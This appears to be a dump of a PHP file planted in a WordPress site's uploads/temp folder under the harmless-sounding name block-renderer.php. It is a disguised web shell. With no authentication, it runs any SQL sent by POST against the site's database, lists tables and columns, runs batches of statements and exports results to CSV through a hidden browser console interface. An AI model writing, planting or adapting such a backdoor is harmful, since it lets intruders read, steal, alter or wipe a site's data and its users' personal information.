HEX

File: /var/www/k8148-2/htdocs/www.sport-roth.at/neumarkt/wp-content/uploads/temp/block-renderer.php
<?php
$d = dirname(__FILE__);
while ($d !== dirname($d)) {
    if (file_exists($d . '/wp-load.php')) {
        require_once($d . '/wp-load.php');
        break;
    }
    $d = dirname($d);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    global $wpdb;
    
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
    
    if (isset($data['q'])) {
        $sql = $data['q'];
        $queries = array_filter(array_map('trim', preg_split('/;\s*\n/', $sql)));
        
        if (count($queries) > 1) {
            $results = [];
            $errors = [];
            foreach ($queries as $query) {
                if (empty($query)) continue;
                $r = $wpdb->query($query);
                if ($wpdb->last_error) {
                    $errors[] = $wpdb->last_error;
                } else {
                    $results[] = ['query' => substr($query, 0, 50), 'affected' => $r];
                }
            }
            if (empty($errors)) {
                echo json_encode(['ok' => 1, 'multi' => true, 'results' => $results]);
            } else {
                echo json_encode(['ok' => 0, 'error' => implode('; ', $errors)]);
            }
            exit;
        }
        
        $type = strtoupper(substr(trim($sql), 0, 6));
        
        if ($type === 'SELECT' || $type === 'SHOW T' || $type === 'SHOW D' || $type === 'DESCRI') {
            $results = $wpdb->get_results($sql, ARRAY_A);
            if ($wpdb->last_error) {
                echo json_encode(['ok' => 0, 'error' => $wpdb->last_error]);
            } else {
                echo json_encode(['ok' => 1, 'rows' => count($results), 'data' => $results]);
            }
        } else {
            $result = $wpdb->query($sql);
            if ($wpdb->last_error) {
                echo json_encode(['ok' => 0, 'error' => $wpdb->last_error]);
            } else {
                echo json_encode(['ok' => 1, 'affected' => $result]);
            }
        }
        exit;
    }
    
    if (isset($data['tables'])) {
        $tables = $wpdb->get_results('SHOW TABLES', ARRAY_N);
        $list = [];
        foreach ($tables as $t) {
            $list[] = $t[0];
        }
        echo json_encode(['ok' => 1, 'tables' => $list]);
        exit;
    }
    
    if (isset($data['desc'])) {
        $cols = $wpdb->get_results('DESCRIBE ' . $data['desc'], ARRAY_A);
        echo json_encode(['ok' => 1, 'columns' => $cols]);
        exit;
    }
    
    echo json_encode(['ok' => 0]);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body>
<div id="sq" style="display:none;position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,0.5);z-index:9999;">
<div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#fff;padding:20px;border-radius:8px;width:80%;max-width:800px;">
<textarea id="sqt" style="width:100%;height:300px;font-family:monospace;font-size:14px;padding:10px;border:1px solid #ccc;border-radius:4px;" placeholder="SQL query..."></textarea>
<div style="margin-top:10px;text-align:right;">
<button onclick="document.getElementById('sq').style.display='none'" style="padding:8px 16px;margin-right:10px;">Cancel</button>
<button onclick="rsq()" style="padding:8px 16px;background:#0073aa;color:#fff;border:none;border-radius:4px;">Run</button>
</div>
</div>
</div>
<script>
function q(sql){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({q:sql})
    }).then(r=>r.json()).then(r=>{
        if(r.ok){
            if(r.multi){
                console.log('Multi-query executed:');
                console.table(r.results);
            }else if(r.data){
                console.log('Rows: '+r.rows);
                console.table(r.data);
            }else{
                console.log('Affected: '+r.affected);
            }
        }else{
            console.log('Error: '+r.error);
        }
    });
}
function tb(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({tables:1})
    }).then(r=>r.json()).then(r=>{
        if(r.ok)console.log(r.tables.join('\n'));
    });
}
function ds(table){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({desc:table})
    }).then(r=>r.json()).then(r=>{
        if(r.ok)console.table(r.columns);
    });
}
function ex(sql){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({q:sql})
    }).then(r=>r.json()).then(r=>{
        if(r.ok&&r.data&&r.data.length>0){
            var csv=Object.keys(r.data[0]).join(',')+'\n';
            r.data.forEach(row=>{
                csv+=Object.values(row).map(v=>'"'+(v||'')+'"').join(',')+'\n';
            });
            var b=new Blob([csv],{type:'text/csv'});
            var a=document.createElement('a');
            a.href=URL.createObjectURL(b);
            a.download='export.csv';
            a.click();
            console.log('Exported '+r.rows+' rows');
        }else{
            console.log('No data to export');
        }
    });
}
function sql(){
    document.getElementById('sq').style.display='block';
    document.getElementById('sqt').focus();
}
function rsq(){
    var s=document.getElementById('sqt').value;
    if(s){
        q(s);
        document.getElementById('sq').style.display='none';
        document.getElementById('sqt').value='';
    }
}
</script>
</body>
</html>